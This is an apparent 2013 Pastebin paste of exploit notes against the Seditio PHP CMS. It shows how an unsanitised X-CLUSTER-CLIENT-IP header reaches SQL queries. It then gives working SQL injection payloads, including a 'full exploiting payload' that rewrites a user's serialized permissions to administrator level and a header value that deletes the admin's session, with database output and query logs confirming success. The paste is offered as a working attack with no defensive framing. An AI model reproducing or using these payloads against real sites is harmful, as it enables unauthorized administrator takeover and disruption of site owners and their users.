daily pastebin goal
40%
SHARE
TWEET

seditio fuck

a guest May 21st, 2013 143 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.                         $cfg['clustermode'] = ADMIN PANEL checkbox YES and value true :)
  2.  
  3. $usr['ip'] = ($cfg['clustermode']) ? $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'] : $_SERVER['REMOTE_ADDR'] ;
  4.  
  5. NOT VALIDATE and SANITIZE
  6.  
  7. SQL Injection :)
  8.  
  9.                 sed_sql_query("UPDATE $db_users SET user_lastip='".$usr['ip']."' WHERE user_id='".$row['user_id']."' LIMIT 1");
  10.  
  11.  
  12. Authentication page (Header)
  13.  
  14. X-CLUSTER-CLIENT-IP: 127.0.0.1' or 1='1
  15.  
  16. QUERY SNIP____
  17.  
  18. MariaDB [sed]> UPDATE sed_users SET user_lastip='127.0.0.1' or 1=1 WHERE user_id=1;
  19.                 /*BLIND SQL*/
  20. +-------------+-----------+
  21. | user_lastip | user_name |
  22. +-------------+-----------+
  23. |  1           | admin     |
  24. +-------------+-----------+
  25. 1 row in set (0.00 sec)
  26.  
  27.  
  28. MariaDB [sed]> select user_lastip,user_name from sed_users;
  29.  
  30. +-------------+-----------+
  31. | user_lastip | user_name |
  32. +-------------+-----------+
  33. | 1           | admin     |
  34. +-------------+-----------+
  35. 1 row in set (0.00 sec)
  36.  
  37. second vector
  38.  
  39. MariaDB [sed]> select user_lastip,user_name from sed_users where user_id=1;
  40. +------------------+-----------+
  41. | user_lastip      | user_name |
  42. +------------------+-----------+
  43. | 5.5.30-MariaDB-m | admin     |
  44. +------------------+-----------+
  45. 1 row in set (0.00 sec)
  46.  
  47.  
  48. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  49. and privileges Escaltion :P
  50.  
  51.  
  52. MariaDB [sed]> select * from sed_auth where auth_code='admin';
  53. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  54. | auth_id | auth_groupid | auth_code | auth_option | auth_rights | auth_rights_lock | auth_setbyuserid |
  55. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  56. |       1 |            1 | admin     | a           |           0 |              255 |                1 |
  57. |       2 |            2 | admin     | a           |           0 |              255 |                1 |
  58. |       3 |            3 | admin     | a           |           0 |              255 |                1 |
  59. |       4 |            4 | admin     | a           |           0 |              255 |                1 |
  60. |       5 |            5 | admin     | a           |         255 |              255 |                1 |
  61. |      76 |            6 | admin     | a           |           1 |                0 |                1 |
  62. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  63.  
  64. 6 rows in set (0.01 sec) = > privileges selection
  65.  
  66.  
  67. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin';
  68. +--------------+-------------+
  69. | auth_groupid | auth_rights |
  70. +--------------+-------------+
  71. |            1 |           0 |
  72. |            2 |           0 |
  73. |            3 |           0 |
  74. |            4 |           0 |
  75. |            5 |         255 |
  76. |            6 |           1 |
  77. +--------------+-------------+
  78. 6 rows in set (0.20 sec)
  79.  
  80.  
  81. = > administrator group int(5)
  82.  
  83.  
  84. administrator rights = > 255 (admin panel keys :D)
  85.  
  86.  
  87. MariaDB [sed]> select grp_id,grp_alias from sed_groups;
  88. +--------+----------------+
  89. | grp_id | grp_alias      |
  90. +--------+----------------+
  91. |      1 | guests         |
  92. |      2 | inactive       |
  93. |      3 | banned         |
  94. |      4 | members        |
  95. |      5 | administrators |
  96. |      6 | moderators     |
  97. +--------+----------------+
  98. 6 rows in set (0.02 sec)
  99.  
  100.  
  101. members request output serialize() call
  102.  
  103. /*
  104. a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  105.  
  106.  
  107. members "admin";a:1:{s:1:"a";i:0;}
  108.  
  109. key (admin) value (a) = > int("0") - (member rights)
  110.  
  111.  
  112. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=4;
  113. +--------------+-------------+
  114. | auth_groupid | auth_rights |
  115. +--------------+-------------+
  116. |            4 |           0 |
  117. +--------------+-------------+
  118.  
  119. */
  120.  
  121.                         if (empty($row['user_auth']))
  122.                                 {
  123.                                 $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
  124.                                 $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
  125.                                 }
  126.  
  127.  
  128.  
  129. administrator request :)
  130. and output result
  131.  
  132. /* output result
  133.                 a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:255;}s:6:"forums";a:2:{i:1;i:255;i:2;i:255;}s:7:"gallery";a:1:{s:1:"a";i:255;}s:5:"index";a:1:{s:1:"a";i:255;}s:7:"message";a:1:{s:1:"a";i:255;}s:4:"page";a:4:{s:8:"articles";i:255;s:4:"news";i:255;s:7:"sample1";i:255;s:7:"sample2";i:255;}s:3:"pfs";a:1:{s:1:"a";i:255;}s:4:"plug";a:13:{s:7:"adminqv";i:255;s:7:"cleaner";i:255;s:7:"contact";i:255;s:14:"massmovetopics";i:255;s:4:"news";i:255;s:11:"passrecover";i:255;s:11:"recentitems";i:255;s:6:"search";i:255;s:10:"skineditor";i:255;s:10:"statistics";i:255;s:8:"syscheck";i:255;s:7:"tinymce";i:255;s:10:"whosonline";i:255;}s:2:"pm";a:1:{s:1:"a";i:255;}s:5:"polls";a:1:{s:1:"a";i:255;}s:7:"ratings";a:1:{s:1:"a";i:255;}s:5:"users";a:1:{s:1:"a";i:255;}}
  134.  
  135.  
  136.  
  137. +++++++++++++++++++++++++++++++++++
  138. admin "admin";a:1:{s:1:"a";i:255;}
  139.  
  140. key (admin) value (a) = > int("0") - (member rights)
  141.  
  142. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=5;
  143. +--------------+-------------+
  144. | auth_groupid | auth_rights |
  145. +--------------+-------------+
  146. |            5 |         255 |
  147. +--------------+-------------+
  148.  
  149.  
  150. */
  151.  
  152.  
  153. =========================================================
  154.  
  155. function sed_auth_build($userid, $maingrp=0)
  156.         {
  157.         global $db_auth, $db_groups_users;
  158.  
  159.         $groups = array();
  160.         $authgrid = array();
  161.         $tmpgrid = array();
  162.  
  163.         if ($userid==0 || $maingrp==0)
  164.                 {
  165.                 $groups[] = 1;
  166.                 }
  167.         else
  168.                 {
  169.                 $groups[] = $maingrp;
  170.                 $sql = sed_sql_query("SELECT gru_groupid FROM $db_groups_users WHERE gru_userid='$userid'");
  171.  
  172.                 while ($row = sed_sql_fetchassoc($sql))
  173.                            { $groups[] = $row['gru_groupid']; }
  174.                 }
  175.  
  176.     $sql_groups = implode(',', $groups);
  177.         $sql = sed_sql_query("SELECT auth_code, auth_option, auth_rights FROM $db_auth WHERE auth_groupid IN (".$sql_groups.") ORDER BY auth_code ASC, auth_option ASC");
  178.  
  179.         while ($row = sed_sql_fetchassoc($sql))
  180.             { $authgrid[$row['auth_code']][$row['auth_option']] |= $row['auth_rights']; }
  181.  
  182.         return($authgrid);      }
  183.  
  184. //update priviliges
  185.  
  186.  
  187.                         $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  188.  
  189.  
  190. Evaluation of the rights admin.
  191.  
  192. $di=unserialize($usr['auth']);
  193.         echo $di['admin']['a']; //output 255 :) then the verification :P
  194.  
  195.  
  196. Priviliges escaltion exploitation
  197.  
  198. problem banlist section :)
  199.  
  200. $usr['ip']="127.0.0.1'or 1=1--";
  201. $userip = explode('.', $usr['ip']);
  202. $ipmasks = "('".$userip[0].".".$userip[1].".".$userip[2].".".$userip[3]."','".$userip[0].".".$userip[1].".".$userip[2].".*','".$userip[0].".".$userip[1].".*.*','".$userip[0].".*.*.*')";
  203. var_dump($userip);
  204.  
  205. IPv4#Addressing 127.0.0.1'or 1=1--
  206.  
  207. echo $usrip[3]; //output result
  208.  
  209. IN(127.0.0.1') or usr_auth='blah'-- -)
  210. nooo syntax :)
  211.  
  212.         second query (Update statement)
  213.  
  214. 130516 21:25:52    66 Query     UPDATE sed_users SET user_lastlog='1368721491', user_lastip='12.3.44.4.4') or usr_auth='blah' -- -
  215.  
  216. true syntax? = nono :)
  217.  
  218.  
  219. 4 th key :)
  220.  
  221. $usr['ip']="127.0.0.1.4'or 1=1-- -";
  222.         var_dump($usr['ip']); //output 4'or 1=1-- -
  223.  
  224.         4 th key not used
  225.  
  226. me login: administrator
  227.           MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G
  228. *************************** 1. row ***************************
  229. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  230. 1 row in set (0.44 sec)
  231.  
  232. (admin) key (a) value => "0" no perm :D
  233.         change perm via sql injection (Priviliges escaltion)
  234.  
  235. No Cookie option
  236.  
  237. if ($cfg['authmode']==2 || $cfg['authmode']==3)
  238.         { session_start(); }
  239.  
  240. if (isset($_SESSION['rsedition']) && ($cfg['authmode']==2 || $cfg['authmode']==3))
  241.         {
  242.         $rsedition = $_SESSION['rsedition'];
  243.         $rseditiop = $_SESSION['rseditiop'];
  244.         $rseditios = $_SESSION['rseditios'];
  245.         }
  246. elseif (isset($_COOKIE['SEDITIO']) && ($cfg['authmode']==1 || $cfg['authmode']==3))
  247.         {
  248.         $u = base64_decode($_COOKIE['SEDITIO']);
  249.         $u = explode(':_:',$u);
  250.         $rsedition = sed_import($u[0],'D','INT');
  251.         $rseditiop = sed_import($u[1],'D','H32');
  252.         $rseditios = sed_import($u[2],'D','ALP');
  253.         }
  254.  
  255. if ($rsedition>0 && $cfg['authmode']>0)
  256.         {
  257.         if (mb_strlen($rseditiop)!=32)
  258.                 { sed_diefatal('Wrong value for the password.'); }
  259.  
  260.         if ($cfg['ipcheck'])
  261.                 { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  262.         else
  263.                 { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  264.  
  265.         if ($row = sed_sql_fetcharray($sql))
  266.                 {
  267.                 if ($row['user_maingrp']>3)
  268.                         {
  269.                         $usr['id'] = $row['user_id'];
  270.                         $usr['sessionid'] = ($cfg['authmode']==1) ? md5($row['user_lastvisit']) : session_id();
  271.                         $usr['name'] = $row['user_name'];
  272.                         $usr['maingrp'] = $row['user_maingrp'];
  273.                         $usr['lastvisit'] = $row['user_lastvisit'];
  274.                         $usr['lastlog'] = $row['user_lastlog'];
  275.                         $usr['timezone'] = $row['user_timezone'];
  276.                         $usr['skin'] = ($cfg['forcedefaultskin']) ? $cfg['defaultskin'] : $row['user_skin'];
  277.                         $usr['lang'] = ($cfg['forcedefaultlang']) ? $cfg['defaultlang'] : $row['user_lang'];
  278.                         $usr['newpm'] = $row['user_newpm'];
  279.                         $usr['auth'] = unserialize($row['user_auth']);
  280.                         $usr['level'] = $sed_groups[$usr['maingrp']]['level'];
  281.                         $usr['profile'] = $row;
  282.  
  283.                         if ($usr['lastlog']+$cfg['timedout'] < $sys['now_offset'])
  284.                                 {
  285.                                 $sys['comingback']= TRUE;
  286.                                 $usr['lastvisit'] = $usr['lastlog'];
  287.                                 $sys['sql_update_lastvisit'] = ", user_lastvisit='".$usr['lastvisit']."'";
  288.                                 }
  289.  
  290.                         if (empty($row['user_auth']))
  291.                                 {
  292.                                 $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
  293.                                 $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
  294.                                 }
  295.  
  296.                 //      $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  297.                         }
  298.                 }
  299.         }
  300.  
  301.  
  302. Cookie header send
  303.  
  304. Cookie: PHPSESSID=blablablasessionidrseditionandauthmode
  305.  
  306.         if true :/ (if ($rsedition>0 && $cfg['authmode']>0));
  307.  
  308. if ($rsedition>0 && $cfg['authmode']>0)
  309.         {
  310.         if (mb_strlen($rseditiop)!=32)
  311.                 { sed_diefatal('Wrong value for the password.'); }
  312.  
  313.         if ($cfg['ipcheck'])
  314.                 { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  315.         else
  316.                 { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  317.  
  318.  
  319. file: config.php
  320. section: $cfg['ipcheck']=true;
  321.  
  322.         fail syntax
  323.  
  324. $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'");
  325.  
  326.         my vector and fail syntax
  327.  
  328. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  329.  
  330.  
  331.         full snip query
  332.  
  333. +++++++++++++++++++++++++++++++++++++
  334. SELECT * FROM $db_users WHERE user_id='3 AND user_password='blah' AND user_lastip='127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -'
  335.  
  336.         Failure syntax :(
  337.  
  338.         LOGIN PAGE REQUEST (HTTP HEADER)
  339. X-CLUSTER-CLIENT-IP: 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  340.  
  341. http://s18.postimg.org/xcjy55mkp/fullquery.png
  342.  
  343.  
  344. return false if the cookie option is empty
  345.  
  346. /*
  347. if ($rsedition>0 && $cfg['authmode']>0) // output result false :) (no cookie option)
  348. */
  349.  
  350.  
  351. after the introduction mysql query log :)
  352.  
  353.                   326 Query     SELECT user_id, user_maingrp, user_banexpire, user_skin, user_lang FROM sed_users WHERE user_password='3e1f0522ece29f7be6f69cd3bfb2d9a8' AND user_name='admin'
  354.                   326 Query     UPDATE sed_users SET user_lastip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' WHERE user_id='1' LIMIT 1
  355.                   326 Query     DELETE FROM sed_online WHERE online_userid='-1' AND online_ip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' LIMIT 1
  356. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  357.  
  358. AFTER
  359.  
  360. Full exploiting payload
  361.  
  362. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  363.  
  364. MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G*************************** 1. row ***************************
  365. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  366. 1 row in set (0.00 sec)
  367.  
  368. "admin";a:1:{s:1:"a";i:255;}
  369.  
  370. value = > "255" WTF ? :D ??
  371.  
  372. ADMIN PANEL :D
  373.  
  374. http://s22.postimg.org/whujo6xu9/lol.png
  375.  
  376.  
  377. ==============================================================
  378.  
  379. Unauthorized user *logout*
  380.  
  381. MariaDB [sed]> select online_ip,online_name from sed_online;
  382. +-----------+-------------+
  383. | online_ip | online_name |
  384. +-----------+-------------+
  385. | 127.0.0.1 | admin       |
  386. | 128.0.0.2 | user        |
  387. +-----------+-------------+
  388. 2 row in set (0.00 sec)
  389.  
  390. me login => user :)
  391.  
  392. Logout page request (HEADER) = > logout.php
  393.  
  394. X-CLUSTER-CLIENT-IP: 127.0.0.1
  395.  
  396. if ($usr['id']>0)
  397.         {
  398.         $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='".$usr['ip']."'");
  399.         sed_redirect("message.php?msg=".$usr['ip']);
  400.         exit;
  401.         }
  402.  
  403. echo $usr['ip'] => Output 127.0.0.1222233' or online_name='admin' (Spoof X IP)-(Administrator IP :D) :)
  404.  
  405. QUERY EXEC - >  $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='127.0.0.1222233' or online_name='admin'");
  406.  
  407. ???? profit = administrator panic :D
  408.  
  409.  
  410. my favorit :) http://www.youtube.com/watch?v=ruFt9ZvBnvo
RAW Paste Data
Pastebin PRO CHRISTMAS Special!
Get 60% OFF Pastebin PRO accounts!
Top